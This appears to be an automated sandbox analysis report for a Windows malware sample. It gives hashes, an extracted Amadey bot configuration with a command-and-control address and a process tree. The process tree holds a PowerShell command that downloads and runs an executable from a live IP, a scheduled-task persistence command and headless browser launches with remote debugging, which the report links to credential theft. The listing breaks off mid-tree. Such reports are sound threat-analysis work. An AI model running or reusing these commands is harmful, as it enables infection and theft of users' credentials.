Analysis

  • max time kernel
    145s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07/04/2025, 14:54

General

  • Target

    2025-04-07_7f60ada34a7eff54af8fe9ecf203f0a7_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    7f60ada34a7eff54af8fe9ecf203f0a7

  • SHA1

    c73ada769eb5438a0f8d35173c6ce80234067b48

  • SHA256

    2691c3893e96a1d16b1021b1dd25a2cd35106013f6c7eefed1360cc3d6e0cbe3

  • SHA512

    de1ec7db2f893c1ab16a8e1d6169a90922ec3b027949d7162bb398c6c6f7b107358f764984b7fd1753ffd13969211fc59710e7c470a34bdc4c5ce9dfe16648da

  • SSDEEP

    24576:iqDEvCTbMWu7rQYlBQcBiT6rprG8a0Ou:iTvC/MTQYxsWR7a0O

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • Stormkitty family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file 12 IoCs
  • Uses browser remote debugging 2 TTPs 10 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 8 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 25 IoCs
  • Identifies Wine through registry keys 2 TTPs 5 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 4 IoCs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 26 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 24 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 21 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies registry class 11 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 20 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-04-07_7f60ada34a7eff54af8fe9ecf203f0a7_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-04-07_7f60ada34a7eff54af8fe9ecf203f0a7_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2352
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn iyFj3maCHiI /tr "mshta C:\Users\Admin\AppData\Local\Temp\md8fdXtZY.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2536
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn iyFj3maCHiI /tr "mshta C:\Users\Admin\AppData\Local\Temp\md8fdXtZY.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:512
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\md8fdXtZY.hta
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1768
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'THADHBEIZF2GNMUBHMCM3SUZ6AL5WLL5.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1164
        • C:\Users\Admin\AppData\Local\TempTHADHBEIZF2GNMUBHMCM3SUZ6AL5WLL5.EXE
          "C:\Users\Admin\AppData\Local\TempTHADHBEIZF2GNMUBHMCM3SUZ6AL5WLL5.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:3900
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2756
            • C:\Users\Admin\AppData\Local\Temp\10480540101\ibC8xs1.exe
              "C:\Users\Admin\AppData\Local\Temp\10480540101\ibC8xs1.exe"
              6⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:876
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x2ycjm41\x2ycjm41.cmdline"
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:4808
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES36F9.tmp" "c:\Users\Admin\AppData\Local\Temp\x2ycjm41\CSCCBDA47E9E8046029837D532D2D59554.TMP"
                  8⤵
                    PID:1628
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  7⤵
                    PID:1712
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                    7⤵
                      PID:4352
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                      7⤵
                      • Downloads MZ/PE file
                      • Accesses Microsoft Outlook accounts
                      • Accesses Microsoft Outlook profiles
                      • Suspicious use of SetThreadContext
                      • Drops file in Program Files directory
                      • System Location Discovery: System Language Discovery
                      • Checks processor information in registry
                      • Suspicious behavior: AddClipboardFormatListener
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SetWindowsHookEx
                      • outlook_office_path
                      • outlook_win_path
                      PID:3408
                      • C:\Windows\system32\rundll32.exe
                        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                        8⤵
                        • Modifies registry class
                        • Suspicious use of FindShellTrayWindow
                        PID:1100
                      • C:\Windows\system32\rundll32.exe
                        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                        8⤵
                        • Modifies registry class
                        • Suspicious use of FindShellTrayWindow
                        PID:936
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        --restore-last-session --remote-debugging-port=9225 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default"
                        8⤵
                        • Uses browser remote debugging
                        • Enumerates system info in registry
                        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                        • Suspicious use of FindShellTrayWindow
                        PID:1016
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x24c,0x7fff7c20f208,0x7fff7c20f214,0x7fff7c20f220
                          9⤵
                            PID:428
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=1908,i,5636224361058924873,12848463159315476553,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1884 /prefetch:2
                            9⤵
                              PID:4996
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2252,i,5636224361058924873,12848463159315476553,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2256 /prefetch:3
                              9⤵
                                PID:2836
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2616,i,5636224361058924873,12848463159315476553,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2612 /prefetch:8
                                9⤵
                                  PID:4552
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3596,i,5636224361058924873,12848463159315476553,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3592 /prefetch:1
                                  9⤵
                                  • Uses browser remote debugging
                                  PID:4420
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3612,i,5636224361058924873,12848463159315476553,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3608 /prefetch:1
                                  9⤵
                                  • Uses browser remote debugging
                                  PID:3120
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4260,i,5636224361058924873,12848463159315476553,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4256 /prefetch:1
                                  9⤵
                                  • Uses browser remote debugging
                                  PID:3784
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --extension-process --renderer-sub-type=extension --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4400,i,5636224361058924873,12848463159315476553,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4396 /prefetch:2
                                  9⤵
                                  • Uses browser remote debugging
                                  PID:4204
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=3724,i,5636224361058924873,12848463159315476553,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3736 /prefetch:8
                                  9⤵
                                    PID:5300
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5300,i,5636224361058924873,12848463159315476553,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5296 /prefetch:8
                                    9⤵
                                      PID:5440
                                  • C:\Windows\system32\rundll32.exe
                                    "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                    8⤵
                                    • Modifies registry class
                                    • Suspicious use of FindShellTrayWindow
                                    PID:3808
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    --restore-last-session --remote-debugging-port=9223 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory="Default"
                                    8⤵
                                    • Uses browser remote debugging
                                    • Enumerates system info in registry
                                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                    • Suspicious use of FindShellTrayWindow
                                    PID:6100
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff80b9dcf8,0x7fff80b9dd04,0x7fff80b9dd10
                                      9⤵
                                        PID:6116
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2044,i,12868088719168881386,4783523877756430602,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2012 /prefetch:2
                                        9⤵
                                          PID:5428
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2108,i,12868088719168881386,4783523877756430602,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2260 /prefetch:3
                                          9⤵
                                            PID:5412
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2412,i,12868088719168881386,4783523877756430602,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2408 /prefetch:8
                                            9⤵
                                              PID:5544
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3280,i,12868088719168881386,4783523877756430602,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3276 /prefetch:1
                                              9⤵
                                              • Uses browser remote debugging
                                              PID:5684
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3616,i,12868088719168881386,4783523877756430602,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3612 /prefetch:1
                                              9⤵
                                              • Uses browser remote debugging
                                              PID:5732
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4408,i,12868088719168881386,4783523877756430602,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4404 /prefetch:2
                                              9⤵
                                              • Uses browser remote debugging
                                              PID:4744
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4584,i,12868088719168881386,4783523877756430602,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4688 /prefetch:1
                                              9⤵
                                              • Uses browser remote debugging
                                              PID:5808
                                          • C:\Windows\system32\rundll32.exe
                                            "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                            8⤵
                                            • Modifies registry class
                                            • Suspicious use of FindShellTrayWindow
                                            PID:4708
                                          • C:\Windows\system32\rundll32.exe
                                            "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                            8⤵
                                            • Modifies registry class
                                            • Suspicious use of FindShellTrayWindow
                                            PID:3864
                                          • C:\Windows\system32\rundll32.exe
                                            "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                            8⤵
                                            • Modifies registry class
                                            • Suspicious use of FindShellTrayWindow
                                            PID:2524
                                          • C:\Windows\system32\rundll32.exe
                                            "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                            8⤵
                                            • Modifies registry class
                                            • Suspicious use of FindShellTrayWindow
                                            PID:5588
                                          • C:\Windows\system32\rundll32.exe
                                            "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                            8⤵
                                            • Modifies registry class
                                            • Suspicious use of FindShellTrayWindow
                                            PID:508
                                          • C:\Windows\system32\rundll32.exe
                                            "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                            8⤵
                                            • Modifies registry class
                                            • Suspicious use of FindShellTrayWindow
                                            PID:4464
                                          • C:\Windows\system32\rundll32.exe
                                            "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                            8⤵
                                            • Modifies registry class
                                            • Suspicious use of FindShellTrayWindow
                                            PID:4740
                                          • C:\Windows\system32\rundll32.exe
                                            "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                            8⤵
                                            • Modifies registry class
                                            • Suspicious use of FindShellTrayWindow
                                            PID:2196
                                          • C:\Windows\system32\rundll32.exe
                                            "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                            8⤵
                                            • Suspicious use of FindShellTrayWindow
                                            PID:5192
                                      • C:\Users\Admin\AppData\Local\Temp\10480910101\DgQBvwg.exe
                                        "C:\Users\Admin\AppData\Local\Temp\10480910101\DgQBvwg.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        • Adds Run key to start application
                                        • Suspicious use of SetThreadContext
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4508
                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pceklbkq\pceklbkq.cmdline"
                                          7⤵
                                            PID:972
                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES80F3.tmp" "c:\Users\Admin\AppData\Local\Temp\pceklbkq\CSCF991F6BF8FA844F591EB7E1483A3A53A.TMP"
                                              8⤵
                                                PID:2204
                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                              7⤵
                                                PID:4944
                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                7⤵
                                                  PID:1980
                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                  7⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:3048
                                              • C:\Users\Admin\AppData\Local\Temp\10492200101\v1BRaoR.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10492200101\v1BRaoR.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetThreadContext
                                                PID:2344
                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                  7⤵
                                                    PID:1924
                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                    7⤵
                                                      PID:1548
                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                      7⤵
                                                        PID:4552
                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                        7⤵
                                                          PID:4960
                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                          7⤵
                                                          • System Location Discovery: System Language Discovery
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:3184
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3184 -s 1416
                                                            8⤵
                                                            • Program crash
                                                            PID:5400
                                                      • C:\Users\Admin\AppData\Local\Temp\10492700101\Nehh6wZ.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10492700101\Nehh6wZ.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetThreadContext
                                                        PID:2636
                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                          7⤵
                                                            PID:756
                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                            7⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:400
                                                        • C:\Users\Admin\AppData\Local\Temp\10493560101\31W3sid.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\10493560101\31W3sid.exe"
                                                          6⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of SetThreadContext
                                                          PID:6004
                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
